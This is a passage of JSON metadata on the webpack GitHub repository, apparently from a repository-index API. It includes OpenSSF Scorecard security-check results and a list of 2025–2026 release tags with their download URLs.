-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fweb